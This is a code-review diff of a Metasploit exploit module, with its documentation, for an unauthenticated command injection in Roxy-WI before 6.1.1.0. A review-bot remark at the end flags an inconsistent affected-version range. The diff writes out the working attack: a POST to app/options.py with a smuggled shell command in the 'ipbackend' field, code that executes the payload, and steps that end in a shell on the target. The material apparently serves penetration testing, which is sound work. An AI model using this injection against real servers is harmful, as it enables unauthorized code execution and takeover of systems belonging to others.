Apply suggestions from code review
Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
@@ -10,7 +10,7 @@ Successful exploitation results in remote code execution under the context of th
|
||||
|
||||
Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
|
||||
|
||||
[https://roxy-wi.org/installation.py](https://roxy-wi.org/installation.py)
|
||||
https://roxy-wi.org/installation.py#manual
|
||||
|
||||
```
|
||||
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
|
||||
@@ -24,12 +24,11 @@ chown -R www-data:www-data haproxy-wi
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/linux/http/roxy_wi_exec`
|
||||
4. Set `RHOST`
|
||||
5. Set `LHOST`
|
||||
4. Set `RHOST` to the address of the target Roxy-WI machine.
|
||||
5. Set `LHOST` to the address of your attacking machine.
|
||||
8. Run `exploit`
|
||||
9. Do: `run`
|
||||
10. You should get a shell.
|
||||
11. **Verify** that you are getting meterpreter session.
|
||||
10. You should get a shell as the user running the Roxy-WI server.
|
||||
|
||||
## Options
|
||||
Set `TAGETURI` if the Roxy-WI is installed at a custom path.
|
||||
|
||||
@@ -14,20 +14,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Roxy-WI Unauthenticated Remote Code Execution',
|
||||
'Name' => 'Roxy-WI < 6.1.1.0 Unauthenticated Command Injection RCE',
|
||||
'Description' => %q{
|
||||
This module exploits command injection vulnerability to achieve remote code execution.
|
||||
Unauthenticated users can execute a terminal command under the context of the web server user.
|
||||
|
||||
Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers. In versions 6.1.1.0 and earlier,
|
||||
an unauthenticated user can execute some methods of administrator functions without needing any credentials.
|
||||
Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account,
|
||||
existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes,
|
||||
or execute operating system command under the context of the web-server user.
|
||||
This module exploits an unauthenticated command injection vulnerability in Roxy-WI
|
||||
prior to version 6.1.1.0. Successful exploitation results in remote code execution
|
||||
under the context of the web server user.
|
||||
|
||||
Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Nuri Çilengir <nuri@prodaft.com>' # Author & Metasploit module
|
||||
'Nuri Çilengir <nuri[at]prodaft.com>' # Author & Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
['URL', 'https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/'], # Advisory
|
||||
@@ -67,14 +64,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'uri' => normalize_uri(target_uri.path, 'app', 'options.py'),
|
||||
'vars_post' => {
|
||||
'serv' => '127.0.0.1',
|
||||
'ipbackend' => "poc\"; #{cmd} ;#",
|
||||
'ipbackend' => "\"; #{cmd} ;#",
|
||||
'alert_consumer' => Rex::Text.rand_text_alpha_lower(7),
|
||||
'backend_server' => '127.0.0.1'
|
||||
}
|
||||
}, 10
|
||||
)
|
||||
rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
|
||||
fail_with(Failure::Unknown, "#{peer} - Something went wrong!")
|
||||
fail_with(Failure::Unreachable, "Couldn't connect to #{peer}, check your connection!")
|
||||
end
|
||||
|
||||
def check
|
||||
@@ -97,14 +94,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
print_status 'Trying to detect command injection vulnerability.'
|
||||
|
||||
begin
|
||||
if target['Arch'] == ARCH_PYTHON
|
||||
execute_command("python3 -c \"#{payload.encoded}\"")
|
||||
else
|
||||
execute_command(payload.encoded)
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
|
||||
fail_with(Failure::Unknown, 'Something went wrong!')
|
||||
else
|
||||
execute_command(payload.encoded)
|
||||
rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
|
||||
fail_with(Failure::Unreachable, "Couldn't connect to #{peer}, check your connection!")
|
||||
else
|
||||
print_good('Exploit successfully executed.')
|
||||
end
|
||||
end
|
||||
|
||||
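Review bot: The affected-version boundary changes in the first hunk of this file: the new `'Name'` (`Roxy-WI < 6.1.1.0 ...`) and the rewritten description (`prior to version 6.1.1.0`) exclude 6.1.1.0 itself, while the description text being replaced said `In versions 6.1.1.0 and earlier`. The difference decides whether someone running 6.1.1.0 reads the module metadata as "patched" or "still exposed", so only one of the two ranges should survive. Please confirm the first fixed release against the advisory listed under `'References'` and make the title, description and module documentation state the same range; if 6.1.1.0 is affected, the title would read `'Roxy-WI <= 6.1.1.0 Unauthenticated Command Injection RCE'`. The `update_info` call continues past the end of that hunk, so any version information further down is not visible here.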